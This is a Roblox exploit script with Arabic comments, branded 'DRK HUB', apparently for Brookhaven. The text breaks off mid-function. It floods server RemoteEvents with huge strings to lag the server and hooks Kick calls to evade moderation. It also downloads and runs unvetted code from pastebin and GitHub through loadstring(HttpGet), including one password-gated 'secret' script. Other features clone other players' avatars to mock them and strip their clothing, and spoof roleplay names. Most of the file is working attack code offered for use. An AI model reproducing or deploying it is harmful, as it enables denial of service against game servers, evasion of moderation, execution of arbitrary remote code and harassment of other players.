-- الجملة المزخرفة التي تظهر في الـ Console عند تشغيل السكربت مباشرة print([[ ▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬ ║ ║ ║ ★彡 [ ٺمِ ٺڜڠێڵ ڛڪڕبٺ مِطۅڕ DRK ] 彡★ ║ ║ ║ ▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬ ]]) setclipboard("script by DRK") local Players = game:GetService("Players") local player = Players.LocalPlayer local playerGui = player:WaitForChild("PlayerGui") local UserInputService = game:GetService("UserInputService") local TweenService = game:GetService("TweenService") local RunService = game:GetService("RunService") local StarterGui = game:GetService("StarterGui") local ReplicatedStorage = game:GetService("ReplicatedStorage") -- تنظيف النسخ القديمة for _,v in ipairs(playerGui:GetChildren()) do if v.Name == "DRK_NewDynamicGui" or v.Name == "DRK_SecurityGui" or v.Name == "ToolDupeGUI" then v:Destroy() end end -- الإعداد السري للباسورد الآمن للسكربت الرئيسي local CORRECT_PASSWORD = "DRK456" -- كلمة السر الخاصة بالسكربت السري الجديد local SECRET_LINK_PASSWORD = "weaker66" -- ================== [ نظام حماية الباسورد الرئيسي ] ================== local securityGui = Instance.new("ScreenGui") securityGui.Name = "DRK_SecurityGui" securityGui.ResetOnSpawn = false securityGui.Parent = playerGui local loginFrame = Instance.new("Frame") loginFrame.Size = UDim2.new(0, 320, 0, 180) loginFrame.Position = UDim2.new(0.5, 0, 0.5, 0) loginFrame.AnchorPoint = Vector2.new(0.5, 0.5) loginFrame.BackgroundColor3 = Color3.fromRGB(12, 12, 12) loginFrame.Active = true loginFrame.Draggable = true loginFrame.Parent = securityGui Instance.new("UICorner", loginFrame).CornerRadius = UDim.new(0, 12) local loginStroke = Instance.new("UIStroke", loginFrame) loginStroke.Color = Color3.fromRGB(200, 0, 0) loginStroke.Thickness = 2 local loginTitle = Instance.new("TextLabel", loginFrame) loginTitle.Size = UDim2.new(1, 0, 0, 40) loginTitle.Text = "🔒 نظام حماية سكربت DRK" loginTitle.Font = Enum.Font.GothamBold loginTitle.TextSize = 16 loginTitle.TextColor3 = Color3.fromRGB(255, 0, 0) loginTitle.BackgroundTransparency = 1 local passBox = Instance.new("TextBox", loginFrame) passBox.Size = UDim2.new(0, 240, 0, 35) passBox.Position = UDim2.new(0.5, -120, 0, 60) passBox.PlaceholderText = "أدخل كلمة المرور الخاصة بك..." passBox.BackgroundColor3 = Color3.fromRGB(22, 22, 22) passBox.TextColor3 = Color3.fromRGB(255, 255, 255) passBox.Font = Enum.Font.Gotham passBox.TextSize = 12 passBox.ClearTextOnFocus = true Instance.new("UICorner", passBox).CornerRadius = UDim.new(0, 6) local pbStroke = Instance.new("UIStroke", passBox) pbStroke.Color = Color3.fromRGB(80, 0, 0) local checkBtn = Instance.new("TextButton", loginFrame) checkBtn.Size = UDim2.new(0, 120, 0, 35) checkBtn.Position = UDim2.new(0.5, -60, 0, 115) checkBtn.BackgroundColor3 = Color3.fromRGB(30, 10, 10) checkBtn.Text = "تحقق ودخول" checkBtn.TextColor3 = Color3.fromRGB(255, 0, 0) checkBtn.Font = Enum.Font.GothamBold checkBtn.TextSize = 13 Instance.new("UICorner", checkBtn).CornerRadius = UDim.new(0, 6) local cbStr = Instance.new("UIStroke", checkBtn) cbStr.Color = Color3.fromRGB(200, 0, 0) -- دالة تشغيل السكربت الفعلي بعد تخطي الحماية بنجاح local function StartDRKHub() securityGui:Destroy() -- إغلاق وحذف نافذة الحماية -- ================== شاشة التحميل الفخمة ================== local loadingGui = Instance.new("ScreenGui") loadingGui.Name = "DRK_Loading" loadingGui.ResetOnSpawn = false loadingGui.Parent = playerGui local loadingFrame = Instance.new("Frame") loadingFrame.Size = UDim2.new(0, 350, 0, 100) loadingFrame.Position = UDim2.new(0.5, 0, 0.5, 0) loadingFrame.AnchorPoint = Vector2.new(0.5, 0.5) loadingFrame.BackgroundColor3 = Color3.fromRGB(15, 15, 15) loadingFrame.Parent = loadingGui Instance.new("UICorner", loadingFrame).CornerRadius = UDim.new(0, 12) local loadStroke = Instance.new("UIStroke", loadingFrame) loadStroke.Color = Color3.fromRGB(200, 0, 0) loadStroke.Thickness = 2 local loadingTitle = Instance.new("TextLabel", loadingFrame) loadingTitle.Size = UDim2.new(1, 0, 0, 40) loadingTitle.Text = "جاري تحميل واجهة DRK اللامعة..." loadingTitle.Font = Enum.Font.GothamBold loadingTitle.TextSize = 16 loadingTitle.TextColor3 = Color3.fromRGB(200, 0, 0) loadingTitle.BackgroundTransparency = 1 local barBg = Instance.new("Frame", loadingFrame) barBg.Size = UDim2.new(0, 300, 0, 10) barBg.Position = UDim2.new(0.5, -150, 0, 60) barBg.BackgroundColor3 = Color3.fromRGB(30, 30, 30) Instance.new("UICorner", barBg) local bar = Instance.new("Frame", barBg) bar.Size = UDim2.new(0, 0, 1, 0) bar.BackgroundColor3 = Color3.fromRGB(200, 0, 0) Instance.new("UICorner", bar) TweenService:Create(bar, TweenInfo.new(1, Enum.EasingStyle.Quad), {Size = UDim2.new(1, 0, 1, 0)}):Play() task.wait(1.1) loadingGui:Destroy() -- ================== [ الواجهة الرئيسية لـ DRK ] ================== local screenGui = Instance.new("ScreenGui") screenGui.Name = "DRK_NewDynamicGui" screenGui.ResetOnSpawn = false screenGui.Parent = playerGui -- زر التشغيل الدائري الفخم (DRK) local toggleButton = Instance.new("TextButton") toggleButton.Size = UDim2.new(0, 50, 0, 50) toggleButton.Position = UDim2.new(0, 15, 0.5, -25) toggleButton.BackgroundColor3 = Color3.fromRGB(15, 15, 15) toggleButton.Text = "DRK" toggleButton.TextColor3 = Color3.fromRGB(255, 0, 0) toggleButton.Font = Enum.Font.GothamBold toggleButton.TextSize = 16 toggleButton.Parent = screenGui Instance.new("UICorner", toggleButton).CornerRadius = UDim.new(1, 0) local toggleStroke = Instance.new("UIStroke", toggleButton) toggleStroke.Color = Color3.fromRGB(200, 0, 0) toggleStroke.Thickness = 2 -- الواجهة الرئيسية الكبرى (Main Frame) local mainFrame = Instance.new("Frame") mainFrame.Size = UDim2.new(0, 520, 0, 340) mainFrame.Position = UDim2.new(0.5, -260, 0.5, -170) mainFrame.BackgroundColor3 = Color3.fromRGB(12, 12, 12) mainFrame.Visible = false mainFrame.Parent = screenGui Instance.new("UICorner", mainFrame).CornerRadius = UDim.new(0, 12) local mainStroke = Instance.new("UIStroke", mainFrame) mainStroke.Color = Color3.fromRGB(200, 0, 0) mainStroke.Thickness = 2 -- الشريط العلوي (Top Header Bar) local topBar = Instance.new("Frame") topBar.Size = UDim2.new(1, 0, 0, 45) topBar.BackgroundColor3 = Color3.fromRGB(18, 18, 18) topBar.Parent = mainFrame local topCorner = Instance.new("UICorner", topBar) topCorner.CornerRadius = UDim.new(0, 12) local topLine = Instance.new("Frame", topBar) topLine.Size = UDim2.new(1, 0, 0, 2) topLine.Position = UDim2.new(0, 0, 1, -2) topLine.BackgroundColor3 = Color3.fromRGB(200, 0, 0) topLine.BorderSizePixel = 0 local logoLabel = Instance.new("TextLabel", topBar) logoLabel.Text = "★ DRK HUB PRIVATE ★" logoLabel.Size = UDim2.new(0, 200, 1, 0) logoLabel.Position = UDim2.new(0, 15, 0, 0) logoLabel.Font = Enum.Font.GothamBold logoLabel.TextSize = 16 logoLabel.TextColor3 = Color3.fromRGB(255, 0, 0) logoLabel.TextXAlignment = Enum.TextXAlignment.Left logoLabel.BackgroundTransparency = 1 local instaBtn = Instance.new("TextButton", topBar) instaBtn.Size = UDim2.new(0, 70, 0, 26) instaBtn.Position = UDim2.new(1, -95, 0.5, -13) instaBtn.BackgroundColor3 = Color3.fromRGB(30, 10, 10) instaBtn.Text = "انستا" instaBtn.TextColor3 = Color3.fromRGB(255, 255, 255) instaBtn.Font = Enum.Font.GothamBold instaBtn.TextSize = 12 Instance.new("UICorner", instaBtn).CornerRadius = UDim.new(0, 6) local instaStroke = Instance.new("UIStroke", instaBtn) instaStroke.Color = Color3.fromRGB(200, 0, 0) instaBtn.MouseButton1Click:Connect(function() setclipboard("DRK") end) -- شريط التبويبات الجانبي (Left Tabs Sidebar) local sidebar = Instance.new("Frame") sidebar.Size = UDim2.new(0, 130, 1, -45) sidebar.Position = UDim2.new(0, 0, 0, 45) sidebar.BackgroundColor3 = Color3.fromRGB(16, 16, 16) sidebar.Parent = mainFrame local sidebarLine = Instance.new("Frame", sidebar) sidebarLine.Size = UDim2.new(0, 2, 1, 0) sidebarLine.Position = UDim2.new(1, -2, 0, 0) sidebarLine.BackgroundColor3 = Color3.fromRGB(200, 0, 0) sidebarLine.BorderSizePixel = 0 local tabLayout = Instance.new("UIListLayout", sidebar) tabLayout.Padding = UDim.new(0, 6) tabLayout.HorizontalAlignment = Enum.HorizontalAlignment.Center -- حاوية الصفحات اليمنى (Pages Container) local container = Instance.new("Frame") container.Size = UDim2.new(1, -135, 1, -55) container.Position = UDim2.new(0, 135, 0, 50) container.BackgroundTransparency = 1 container.Parent = mainFrame local pages = {} local function createPage(name) local page = Instance.new("Frame") page.Size = UDim2.new(1, 0, 1, 0) page.BackgroundTransparency = 1 page.Visible = false page.Parent = container pages[name] = page return page end local mainPage = createPage("الرئيسية 🏠") local pointsPage = createPage("النقاط 📊") local repairPage = createPage("نسخ الخصم 👥") local scriptsPage = createPage("سكربتات 📜") local activeTabButton = nil local function createTabButton(name) local btn = Instance.new("TextButton") btn.Size = UDim2.new(0, 115, 0, 35) btn.BackgroundColor3 = Color3.fromRGB(22, 22, 22) btn.Text = name btn.TextColor3 = Color3.fromRGB(180, 180, 180) btn.Font = Enum.Font.GothamBold btn.TextSize = 12 btn.Parent = sidebar Instance.new("UICorner", btn).CornerRadius = UDim.new(0, 6) local stroke = Instance.new("UIStroke", btn) stroke.Color = Color3.fromRGB(40, 40, 40) stroke.Thickness = 1 btn.MouseButton1Click:Connect(function() for _, p in pairs(pages) do p.Visible = false end pages[name].Visible = true if activeTabButton then activeTabButton.BackgroundColor3 = Color3.fromRGB(22, 22, 22) activeTabButton.TextColor3 = Color3.fromRGB(180, 180, 180) activeTabButton:FindFirstChildOfClass("UIStroke").Color = Color3.fromRGB(40, 40, 40) end activeTabButton = btn btn.BackgroundColor3 = Color3.fromRGB(60, 5, 5) btn.TextColor3 = Color3.fromRGB(255, 0, 0) stroke.Color = Color3.fromRGB(200, 0, 0) end) end createTabButton("الرئيسية 🏠") createTabButton("النقاط 📊") createTabButton("نسخ الخصم 👥") createTabButton("سكربتات 📜") pages["الرئيسية 🏠"].Visible = true local function buildStandardButton(parent, text, callback) local b = Instance.new("TextButton", parent) b.Text = text b.BackgroundColor3 = Color3.fromRGB(25, 25, 25) b.TextColor3 = Color3.fromRGB(255, 0, 0) b.Font = Enum.Font.GothamBold b.TextSize = 12 Instance.new("UICorner", b).CornerRadius = UDim.new(0, 6) local s = Instance.new("UIStroke", b) s.Color = Color3.fromRGB(150, 0, 0) b.MouseButton1Click:Connect(callback) return b, s end -- [الرئيسية 🏠] local mainScroll = Instance.new("ScrollingFrame", mainPage) mainScroll.Size = UDim2.new(1, 0, 1, 0) mainScroll.BackgroundTransparency = 1 mainScroll.ScrollBarThickness = 2 mainScroll.ScrollBarImageColor3 = Color3.fromRGB(200, 0, 0) local mainLayout = Instance.new("UIListLayout", mainScroll) mainLayout.Padding = UDim.new(0, 8) mainLayout.HorizontalAlignment = Enum.HorizontalAlignment.Center local lagActive = false local firewallActivated = false local antiLagActive = false local lagBtn, lagStroke = buildStandardButton(mainScroll, "تفعيل مضاد النقاط 🛡️", function() end) lagBtn.Size = UDim2.new(0, 240, 0, 40) lagBtn.MouseButton1Click:Connect(function() lagActive = not lagActive if lagActive then lagBtn.Text = "إيقاف حماية النقاط 🛑" lagBtn.BackgroundColor3 = Color3.fromRGB(120, 0, 0) task.spawn(function() local remote = ReplicatedStorage:FindFirstChild("RE") and ReplicatedStorage.RE:FindFirstChild("1RPNam1eTex1t") local superMegaData = string.rep("DRK_ANTI_POINTS_OVERPOWERED_", 10000) if remote then while lagActive do for i = 1, 15 do if not lagActive then break end remote:FireServer("RolePlayName", superMegaData) end task.wait(0.1) end else for _, v in pairs(ReplicatedStorage:GetDescendants()) do if v:IsA("RemoteEvent") then while lagActive do for i = 1, 15 do if not lagActive then break end v:FireServer(superMegaData) end task.wait(0.1) end break end end end end) else lagBtn.Text = "تفعيل مضاد النقاط 🛡️" lagBtn.BackgroundColor3 = Color3.fromRGB(25, 25, 25) end end) local fwBtn, fwStroke = buildStandardButton(mainScroll, "تطويل مدة السيرفر (حماية)", function() end) fwBtn.Size = UDim2.new(0, 240, 0, 40) fwBtn.MouseButton1Click:Connect(function() if not firewallActivated then firewallActivated = true fwBtn.Text = "🛡️ نظام الحماية مفعّل" fwBtn.BackgroundColor3 = Color3.fromRGB(120, 0, 0) task.spawn(function() local GuiService = game:GetService("GuiService") local oldKick oldKick = hookmetamethod(game, "__namecall", function(self, ...) local method = getnamecallmethod() if self == player and (method == "Kick" or method == "kick") then return nil end return oldKick(self, ...) end) player.Kick = function() return nil end settings().Network.IncomingReplicationLag = 999999 GuiService.ErrorMessageChanged:Connect(function(errorMessage, errorCode) if errorCode == Enum.ConnectionError.DisconnectErrors or errorCode == Enum.ConnectionError.CrashErrors then pcall(function() GuiService:ClearError() game:GetService("CoreGui").RobloxPromptGui.promptOverlay.Visible = false end) end end) end) end end) local alBtn, alStroke = buildStandardButton(mainScroll, "المضاد الخارق (Anti-Lag)", function() end) alBtn.Size = UDim2.new(0, 240, 0, 40) alBtn.MouseButton1Click:Connect(function() antiLagActive = not antiLagActive if antiLagActive then alBtn.Text = "المضاد الخارق (ON) ⚡" alBtn.BackgroundColor3 = Color3.fromRGB(120, 0, 0) for _, otherPlayer in pairs(game.Players:GetPlayers()) do if otherPlayer ~= player and otherPlayer.Character then otherPlayer.Character.Parent = game:GetService("Lighting") end end settings().Rendering.QualityLevel = 1 for _, v in pairs(game:GetDescendants()) do if v:IsA("Part") or v:IsA("MeshPart") then v.Material = Enum.Material.SmoothPlastic v.CastShadow = false elseif v:IsA("ParticleEmitter") or v:IsA("Explosion") or v:IsA("Fire") then v.Enabled = false end end else alBtn.Text = "المضاد الخارق (Anti-Lag)" alBtn.BackgroundColor3 = Color3.fromRGB(25, 25, 25) for _, otherPlayer in pairs(game.Players:GetPlayers()) do if otherPlayer.Character then otherPlayer.Character.Parent = workspace end end end end) local customBtn = buildStandardButton(mainScroll, "الاختصار المزخرف 「 N 」", function() print("DRK N Button Clicked") end) customBtn.Size = UDim2.new(0, 240, 0, 40) -- ================== [ الزر المطور للسكربت السري ] ================== local secretBtn, secretStroke = buildStandardButton(mainScroll, "تفعيل السكربت السري 🔑", function() end) secretBtn.Size = UDim2.new(0, 240, 0, 40) secretBtn.BackgroundColor3 = Color3.fromRGB(40, 5, 5) -- نافذة التحقق المصغرة الخاصة بالرابط السري local secretPrompt = Instance.new("Frame", screenGui) secretPrompt.Size = UDim2.new(0, 250, 0, 110) secretPrompt.Position = UDim2.new(0.5, -125, 0.5, -55) secretPrompt.BackgroundColor3 = Color3.fromRGB(15, 15, 15) secretPrompt.Visible = false Instance.new("UICorner", secretPrompt).CornerRadius = UDim.new(0, 10) local spStroke = Instance.new("UIStroke", secretPrompt) spStroke.Color = Color3.fromRGB(200, 0, 0) local spTitle = Instance.new("TextLabel", secretPrompt) spTitle.Size = UDim2.new(1, 0, 0, 30) spTitle.Text = "أدخل كلمة سر السكربت" spTitle.Font = Enum.Font.GothamBold spTitle.TextSize = 12 spTitle.TextColor3 = Color3.fromRGB(255, 255, 255) spTitle.BackgroundTransparency = 1 local secretBox = Instance.new("TextBox", secretPrompt) secretBox.Size = UDim2.new(0, 200, 0, 30) secretBox.Position = UDim2.new(0.5, -100, 0, 35) secretBox.PlaceholderText = "Password..." secretBox.BackgroundColor3 = Color3.fromRGB(25, 25, 25) secretBox.TextColor3 = Color3.fromRGB(255, 255, 255) secretBox.Font = Enum.Font.Gotham secretBox.TextSize = 12 Instance.new("UICorner", secretBox) local spConfirm = Instance.new("TextButton", secretPrompt) spConfirm.Size = UDim2.new(0, 90, 0, 25) spConfirm.Position = UDim2.new(0.5, -45, 0, 75) spConfirm.BackgroundColor3 = Color3.fromRGB(30, 0, 0) spConfirm.Text = "تأكيد" spConfirm.TextColor3 = Color3.fromRGB(255, 0, 0) spConfirm.Font = Enum.Font.GothamBold spConfirm.TextSize = 12 Instance.new("UICorner", spConfirm) local spcStroke = Instance.new("UIStroke", spConfirm) spcStroke.Color = Color3.fromRGB(200, 0, 0) secretBtn.MouseButton1Click:Connect(function() secretPrompt.Visible = not secretPrompt.Visible secretBox.Text = "" secretBox.PlaceholderText = "Password..." end) -- تعديل منطق الإطلاق ليكون فوري ومجرب داخل الـ Thread الآمن spConfirm.MouseButton1Click:Connect(function() if secretBox.Text == SECRET_LINK_PASSWORD then secretPrompt.Visible = false -- استخدام تسريع وتحميل فوري للرابط لضمان التشغيل دون تعليق task.spawn(function() local success, result = pcall(function() return game:HttpGet('https://pastebin.com/raw/gc7Fry9s') end) if success and result then local executedFunction, compileError = loadstring(result) if executedFunction then task.wait(0.1) executedFunction() -- إطلاق فوري ومباشر هنا else warn("خطأ في معالجة الكود الداخلي للرابط: " .. tostring(compileError)) end else warn("فشل جلب البيانات من الرابط الخاص بك: " .. tostring(result)) end end) else secretBox.Text = "" secretBox.PlaceholderText = "❌ كلمة السر خاطئة!" end end) mainScroll.CanvasSize = UDim2.new(0, 0, 0, mainLayout.AbsoluteContentSize.Y + 15) -- [النقاط 📊] local tracked = {} local yourStayLabel = Instance.new("TextLabel", pointsPage) yourStayLabel.Size = UDim2.new(1, 0, 0, 20) yourStayLabel.Text = "مدة بقائك: 00:00:00" yourStayLabel.TextColor3 = Color3.fromRGB(255, 0, 0) yourStayLabel.Font = Enum.Font.GothamBold yourStayLabel.BackgroundTransparency = 1 local pAvatar = Instance.new("ImageLabel", pointsPage) pAvatar.Size = UDim2.new(0, 50, 0, 50) pAvatar.Position = UDim2.new(0.5, -25, 0, 25) pAvatar.Image = "rbxasset://textures/face.png" pAvatar.BackgroundColor3 = Color3.fromRGB(20,20,20) Instance.new("UICorner", pAvatar).CornerRadius = UDim.new(1, 0) local sBox = Instance.new("TextBox", pointsPage) sBox.Size = UDim2.new(0, 180, 0, 30) sBox.Position = UDim2.new(0, 10, 0, 85) sBox.PlaceholderText = "اسم اللاعب للتتبع..." sBox.BackgroundColor3 = Color3.fromRGB(20, 20, 20) sBox.TextColor3 = Color3.fromRGB(255, 255, 255) sBox.TextSize = 11 Instance.new("UICorner", sBox) local sbStroke = Instance.new("UIStroke", sBox) sbStroke.Color = Color3.fromRGB(150, 0, 0) local addBtn = buildStandardButton(pointsPage, "إضافة", function() end) addBtn.Size = UDim2.new(0, 60, 0, 30) addBtn.Position = UDim2.new(0, 195, 0, 85) local pScrolling = Instance.new("ScrollingFrame", pointsPage) pScrolling.Size = UDim2.new(1, 0, 0, 150) pScrolling.Position = UDim2.new(0, 0, 0, 125) pScrolling.BackgroundTransparency = 1 pScrolling.ScrollBarThickness = 3 pScrolling.ScrollBarImageColor3 = Color3.fromRGB(255, 0, 0) local pList = Instance.new("UIListLayout", pScrolling) pList.Padding = UDim.new(0, 4) local function formatTime(s) local h = math.floor(s / 3600) local m = math.floor((s % 3600) / 60) local sec = s % 60 return string.format("%02d:%02d:%02d", h, m, sec) end addBtn.MouseButton1Click:Connect(function() local txt = sBox.Text if txt == "" then return end local found = nil for _, p in Players:GetPlayers() do if p.Name:lower():find(txt:lower()) or (p.DisplayName and p.DisplayName:lower():find(txt:lower())) then found = p break end end if found then local uid = found.UserId if tracked[uid] then pAvatar.Image = tracked[uid].avatar return end local av = "rbxasset://textures/face.png" pcall(function() av = Players:GetUserThumbnailAsync(uid, Enum.ThumbnailType.HeadShot, Enum.ThumbnailSize.Size420x420) end) tracked[uid] = { name = found.Name, startTime = tick(), entry = 1, exit = 0, avatar = av } local itm = Instance.new("Frame", pScrolling) itm.Size = UDim2.new(1, -10, 0, 45) itm.BackgroundColor3 = Color3.fromRGB(20, 20, 20) Instance.new("UICorner", itm) local nLbl = Instance.new("TextLabel", itm) nLbl.Size = UDim2.new(0, 100, 0, 20) nLbl.Position = UDim2.new(0, 10, 0, 3) nLbl.Text = found.Name nLbl.TextColor3 = Color3.fromRGB(255, 255, 255) nLbl.Font = Enum.Font.GothamBold nLbl.TextSize = 11 nLbl.BackgroundTransparency = 1 local tLbl = Instance.new("TextLabel", itm) tLbl.Size = UDim2.new(0, 100, 0, 20) tLbl.Position = UDim2.new(0, 10, 0, 22) tLbl.Text = "مدة: 00:00:00" tLbl.TextColor3 = Color3.fromRGB(200, 0, 0) tLbl.Font = Enum.Font.Gotham tLbl.TextSize = 10 tLbl.BackgroundTransparency = 1 local jLbl = Instance.new("TextLabel", itm) jLbl.Size = UDim2.new(0, 60, 0, 20) jLbl.Position = UDim2.new(1, -130, 0, 12) jLbl.Text = "دخول: 1" jLbl.TextColor3 = Color3.fromRGB(0, 255, 100) jLbl.Font = Enum.Font.Gotham jLbl.TextSize = 11 jLbl.BackgroundTransparency = 1 local eLbl = Instance.new("TextLabel", itm) eLbl.Size = UDim2.new(0, 60, 0, 20) eLbl.Position = UDim2.new(1, -70, 0, 12) eLbl.Text = "خروج: 0" eLbl.TextColor3 = Color3.fromRGB(255, 60, 60) eLbl.Font = Enum.Font.Gotham eLbl.TextSize = 11 eLbl.BackgroundTransparency = 1 tracked[uid].gui = {time = tLbl, join = jLbl, exit = eLbl} pAvatar.Image = av pScrolling.CanvasSize = UDim2.new(0, 0, 0, pList.AbsoluteContentSize.Y + 10) end end) local myStart = tick() RunService.Heartbeat:Connect(function() yourStayLabel.Text = "مدة بقائك: " .. formatTime(math.floor(tick() - myStart)) for uid, data in pairs(tracked) do if data.gui and data.gui.time then data.gui.time.Text = "مدة: " .. formatTime(math.floor(tick() - data.startTime)) end end end) Players.PlayerAdded:Connect(function(plr) if tracked[plr.UserId] then tracked[plr.UserId].entry = tracked[plr.UserId].entry + 1 if tracked[plr.UserId].gui then tracked[plr.UserId].gui.join.Text = "دخول: " .. tracked[plr.UserId].entry end end end) Players.PlayerRemoving:Connect(function(plr) if tracked[plr.UserId] then tracked[plr.UserId].exit = tracked[plr.UserId].exit + 1 if tracked[plr.UserId].gui then tracked[plr.UserId].gui.exit.Text = "خروج: " .. tracked[plr.UserId].exit end end end) -- [نسخ الخصم 👥] local repLayout = Instance.new("UIListLayout", repairPage) repLayout.Padding = UDim.new(0, 8) repLayout.HorizontalAlignment = Enum.HorizontalAlignment.Center local repBox = Instance.new("TextBox", repairPage) repBox.Size = UDim2.new(0, 220, 0, 32) repBox.PlaceholderText = "Target Name" repBox.BackgroundColor3 = Color3.fromRGB(20, 20, 20) repBox.TextColor3 = Color3.fromRGB(255, 255, 255) Instance.new("UICorner", repBox) local rbStr = Instance.new("UIStroke", repBox) rbStr.Color = Color3.fromRGB(150, 0, 0) local currentClone = nil local function CreateNameTag(parent, name) local billboard = Instance.new("BillboardGui", parent) billboard.Size = UDim2.new(0, 200, 0, 50) billboard.Adornee = parent:FindFirstChild("Head") billboard.AlwaysOnTop = true billboard.ExtentsOffset = Vector3.new(0, 3, 0) local label = Instance.new("TextLabel", billboard) label.Text = name label.Size = UDim2.new(1, 0, 1, 0) label.BackgroundTransparency = 1 label.TextColor3 = Color3.fromRGB(255, 0, 0) label.TextSize = 14 label.Font = Enum.Font.Code end local b1 = buildStandardButton(repairPage, "BRING (GHOST)", function() local name = repBox.Text:lower() local targetPlayer = nil for _, p in pairs(game.Players:GetPlayers()) do if p.Name:lower():find(name) or p.DisplayName:lower():find(name) then targetPlayer = p break end end if targetPlayer and targetPlayer.Character then if currentClone then currentClone:Destroy() end targetPlayer.Character.Archivable = true currentClone = targetPlayer.Character:Clone() currentClone.Parent = workspace CreateNameTag(currentClone, "@" .. targetPlayer.Name) for _, v in pairs(currentClone:GetDescendants()) do if v:IsA("LocalScript") or v:IsA("Script") then v:Destroy() end end local myHrp = player.Character and player.Character:FindFirstChild("HumanoidRootPart") if myHrp then currentClone:SetPrimaryPartCFrame(myHrp.CFrame * CFrame.new(0, 0, -5) * CFrame.Angles(0, math.pi, 0)) end for _, part in pairs(currentClone:GetDescendants()) do if part:IsA("BasePart") then part.Anchored = true part.CanCollide = false end end end end) b1.Size = UDim2.new(0, 200, 0, 35) local b2 = buildStandardButton(repairPage, "وضعية مضحكة", function() if currentClone then for _, v in pairs(currentClone:GetDescendants()) do if v:IsA("BasePart") then v.Anchored = false end end if currentClone:FindFirstChild("UpperTorso") and currentClone.UpperTorso:FindFirstChild("Waist") then currentClone.UpperTorso.Waist.C0 = CFrame.Angles(math.rad(45), 0, 0) end if currentClone:FindFirstChild("LeftUpperArm") and currentClone.LeftUpperArm:FindFirstChild("LeftShoulder") then currentClone.LeftUpperArm.LeftShoulder.C0 = CFrame.Angles(math.rad(-110), 0, 0) end task.wait(0.1) for _, v in pairs(currentClone:GetDescendants()) do if v:IsA("BasePart") then v.Anchored = true end end end end) b2.Size = UDim2.new(0, 200, 0, 35) local b3 = buildStandardButton(repairPage, "إزالة الملابس 😂", function() if currentClone then for _, v in pairs(currentClone:GetDescendants()) do if v:IsA("Clothing") or v:IsA("Accessory") or v:IsA("ShirtGraphic") then v:Destroy() end end end end) b3.Size = UDim2.new(0, 200, 0, 35) -- [سكربتات 📜] local scrScrolling = Instance.new("ScrollingFrame", scriptsPage) scrScrolling.Size = UDim2.new(1, 0, 1, 0) scrScrolling.BackgroundTransparency = 1 scrScrolling.ScrollBarThickness = 4 scrScrolling.ScrollBarImageColor3 = Color3.fromRGB(255, 0, 0) local scrGrid = Instance.new("UIGridLayout", scrScrolling) scrGrid.CellSize = UDim2.new(0, 110, 0, 40) scrGrid.CellPadding = UDim2.new(0, 8, 0, 8) scrGrid.HorizontalAlignment = Enum.HorizontalAlignment.Center local externalScripts = { {name="AFK", url='https://pastebin.com/raw/vsLiJW5G'}, {name="Bang", url='https://pastebin.com/raw/X2BfDMk8'}, {name="مضاد جلوس", url='https://pastebin.com/raw/BAyk96Dc'}, {name="طيران", url='https://pastebin.com/raw/34V6Rcq4'}, {name="مشي R6", url='https://rawscripts.net/raw/Universal-Script-R6-Animations-on-R15-16865'}, {name="بوابات", url='https://pastebin.com/raw/Z22wgngJ'}, {name="طيران كنبه", url='https://raw.githubusercontent.com/0Ben1/fe./main/Fling%20GUI'}, {name="سفينة", url='https://pastebin.com/raw/C2FXjKSa'}, {name="انفنتي", url='https://raw.githubusercontent.com/EdgeIY/infiniteyield/master/source'}, {name="نقاط", url='https://pastebin.com/raw/QDRBxuQX'}, {name="مراقبه", url='https://pastebin.com/raw/RLAuiL2R'} } for _, data in ipairs(externalScripts) do local btn, stroke = buildStandardButton(scrScrolling, data.name, function() loadstring(game:HttpGet(data.url))() end) end scrScrolling.CanvasSize = UDim2.new(0, 0, 0, scrGrid.AbsoluteContentSize.Y + 20) -- [أنظمة السحب والإغلاق والتشغيل التلقائي] local function makeDraggable(frame) local dragging = false local dragInput, mousePos, framePos frame.InputBegan:Connect(function(input) if input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch then dragging = true mousePos = input.Position framePos = frame.Position input.Changed:Connect(function() if input.UserInputState == Enum.UserInputState.End then dragging = false end end) end end) frame.InputChanged:Connect(function(input) if input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch then dragInput = input end end) UserInputService.InputChanged:Connect(function(input) if input == dragInput and dragging then local delta = input.Position - mousePos frame.Position = UDim2.new(framePos.X.Scale, framePos.X.Offset + delta.X, framePos.Y.Scale, framePos.Y.Offset + delta.Y) end end) end makeDraggable(mainFrame) makeDraggable(toggleButton) makeDraggable(secretPrompt) toggleButton.MouseButton1Click:Connect(function() mainFrame.Visible = not mainFrame.Visible end) -- نظام تغيير الهوية التلقائي لبروكهيفن local RE = ReplicatedStorage:FindFirstChild("RE") if RE then local RPNameColorRemote = RE:FindFirstChild("1RPNam1eColo1r") local RPBioColorRemote = RE:FindFirstChild("1RPNam1eColo1r") local RPNameTextRemote = RE:FindFirstChild("1RPNam1eTex1t") local RPBioTextRemote = RE:FindFirstChild("1RPNam1eTex1t") if RPNameColorRemote then RPNameColorRemote:FireServer("PickingRPNameColor", Color3.fromRGB(0,0,0)) end if RPBioColorRemote then RPBioColorRemote:FireServer("PickingRPBioColor", Color3.fromRGB(0,0,0)) end if RPNameTextRemote then RPNameTextRemote:FireServer("RolePlayName", "DRK") end if RPBioTextRemote then RPBioTextRemote:FireServer("RolePlayBio", "Script By DRK") end end -- ================================================================================= -- ================== [ الجزء الثاني: سكربت الأدوات واللاق المدمج ] ================== -- ================================================================================= local runningLoops = {} local hasStartedDuping = {} local counters = {} local function CountTool(toolName) local backpack = player:WaitForChild("Backpack") local character = player.Character or player.CharacterAdded:Wait() local count = 0 for _, tool in ipairs(backpack:GetChildren()) do if tool.Name == toolName then count += 1 end end for _, tool in ipairs(character:GetChildren()) do if tool:IsA("Tool") and tool.Name == toolName then count += 1 end end return count end local function HideCharacter() local char = player.Character if char and char.Parent then char.Parent = nil end end local function ShowCharacter() local char = player.Character if char and not char.Parent then char.Parent = workspace end end local function ClearTools() local char = player.Character local backpack = player:FindFirstChild("Backpack") if backpack then for _, tool in ipairs(backpack:GetChildren()) do if tool:IsA("Tool") then tool:Destroy() end end end if char then for _, tool in ipairs(char:GetChildren()) do if tool:IsA("Tool") then 